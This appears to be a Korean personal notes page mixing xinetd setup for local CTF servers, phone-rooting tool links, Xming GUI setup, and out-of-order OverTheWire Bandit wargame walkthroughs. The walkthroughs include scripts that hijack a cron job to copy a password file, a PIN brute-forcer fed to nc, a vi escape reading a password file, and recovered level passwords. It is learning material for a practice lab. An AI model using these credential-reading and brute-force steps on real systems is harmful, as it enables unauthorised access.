cm9200

1. xinetd 설치

sudo apt-get install xinetd

2. 서비스 생성

/etc/xinetd.d/ 에 자신이 만들 서비스의 이름으로 다음과 같은 스크립트를 넣어준다. ( gedit, vi 등 그냥 만들면됨)

service 서비스이름
{
        disable         = no
        flags           = REUSE
        socket_type     = stream
        protocol        = tcp
        user            = (계정 이름)
        wait            = no
        server          = 바이너리경로(실행시킬 파일)
}

3. 포트 설정

일단 지금은 로컬이므로, /etc/services 파일에서 맨 마지막 문단 #Local Services 아래에 설정을 적어준다.

ex) # Local services

        test 1234/tcp

4. xinetd 재시작

service xinetd restart

로컬서버를 이용해 문 닫은 ctf문제도 다시 풀어볼 수 있다.

옛날엔 뭐 z4 root, framaroot 등 별별 어플이 다 있었고 ㅈ같은 중국에서 만든 바이러스를 심은 루팅앱도 많았는데

요즘은 그냥 안드로이드, ios 각각 루팅하려면 하나면 해결되는것같다. 

안드로이드는 Magisk

>>magiskmanager.com/

리커버리만 설치해주면 magisk쪽에서 zip파일을 다운받거나 알아서 플래싱을 해준다. 리커버리 환경도 아닌데 플래싱을 해주는 대단한 어플.. 원리는 나도 모른다 ~ (옛날에도 이런 방식의 플래싱툴이 있었는데 부작용이 많아서 안씀)

ios는 반루팅이긴 하지만 unc0ver

>>unc0ver.dev/

ios도 많이 쉬워졌다. 애플쪽은 칩이 통일되어있어서 하나가 되면 그 칩을 사용하는 모든 기기들은 다 된다고 본다.

설치법은 뭐 설명할것도 없으므로 그냥 위 링크를 참조 :ㅇ

sourceforge.net/projects/xming/

그냥 다 다음을 눌러도 상관 없는듯.

이제 다음 코드를 우분투에 넣어준다.

sudo systemd-machine-id-setup
sudo dbus-uuidgen --ensure

#cat /etc/machine-id 로 확인


sudo apt-get install x11-apps xfonts-base xfonts-100dpi xfonts-75dpi xfonts-cyrillic
export DISPLAY=:
soruce ~/.bashrc

#xeyes로 확인

이렇게 윈도우에서 vm말고 내장된 우분투를 gui와 함께 이용할 수 있다.

쉘이 다르다고 한다. /etc/passwd에서 알아보면, 

정상이 아닌것 같긴 하다.

보아하니 , 

more이라는 명령어가 뭔지 몰랐는데 

화면 작게만들면 표시가 안나서 로딩중? 이라는 의미인것 같다 

이거 말하는거임

여기서 vi로 들어가서 :로 명령어 r /etc/bandit_pass/bandit26을 입력하면 

짜잔 마법입니다   

아마 위에서 로딩된 text.txt파일의 소유자가 bandit26이고, 그 파일을 실행중이니깐 접근 권한이 생긴것 같다.

5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

무차별 대입을 하면 되고, 코드는 간단하게 작성할 수 있다. 

#!/bin/bash
for i in {0000..9999}
do 
	echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"
done

sh파일 결과를 txt로 저장하고, 이 txt를 nc에 넣어주면 된다. 

uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

쉘 스크립트를 작성해야한다니, 어려워 보이지만 사실 리눅스 명령어를 몇개 나열하면 된다.

cron에서 sh파일 찾는건 전이랑 같으므로 생략한다. 

#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

전부 실행시키고 지워버린다. 

그럼 해당 경로에 bandit_pass/bandit24파일을 따로 복사해놓으면 된다. 

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/b/eing

이 쉘을 넣어주면 풀릴듯

아 그리고 이 쉘은 위에 코드를 보면 알수 있듯이 /var/spool/$myname(bandit24) 에 있는 모든 코드를 실행시키므로, 여기에 넣어준다. 

여러 삽질을 했는데, 

우선 내가 만들 파일에 권한을 줘야한다. (666)

그 다음, tmp에서 만든 sh파일을 복사해주고, 기다리면 키가 나온다. 

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ ls
cronjob_bandit15_root  cronjob_bandit22  cronjob_bandit24
cronjob_bandit17_root  cronjob_bandit23  cronjob_bandit25_root
bandit22@bandit:/etc/cron.d$ fiel cronjob_bandit23
-bash: fiel: command not found
bandit22@bandit:/etc/cron.d$ file cronjob_bandit23
cronjob_bandit23: ASCII text
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
bandit22@bandit:/etc/cron.d$ 

형식이 다 나와있으므로 echo로 id를 확인해주면 주소가 나온다. 

jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

cron은 작업 예약 명령으로, 윈도우에선 시작프로그램처럼 자동으로 처리되는 프로그램인것 같다. 관련된건 구글링 

열어보니 sh명령을 백그라운드로 돌리고 있다. 가서 확인해보자.

가서 읽어보면 된다.

Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI